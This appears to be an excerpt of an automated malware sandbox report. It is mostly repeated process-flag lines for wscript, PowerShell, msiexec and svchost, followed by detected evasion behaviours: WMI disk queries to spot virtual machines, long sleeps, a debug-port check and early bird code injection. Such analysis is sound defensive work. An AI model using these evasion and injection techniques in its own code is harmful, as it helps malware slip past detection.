                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 57FB83A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5136Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4737Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5513Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4203Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 1964Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452620B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,14_3_00007DF452620B80
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF45268D66C GetSystemInfo,14_3_00007DF45268D66C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                        Source: msiexec.exe, 00000009.00000003.1940138340.0000000000649000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.1959171271.0000000000649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                        Source: svchost.exe, 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: msiexec.exe, 00000009.00000003.1940138340.0000000000649000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.1959171271.0000000000649000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000016.00000002.2627173670.000001E53186C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000004.00000002.1563606959.0000021DEFE19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                        Source: svchost.exe, 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C8D6E0 LdrInitializeThunk,LdrInitializeThunk,7_2_04C8D6E0
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D30283 mov eax, dword ptr fs:[00000030h]13_3_02D30283

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Early bird code injection technique detected
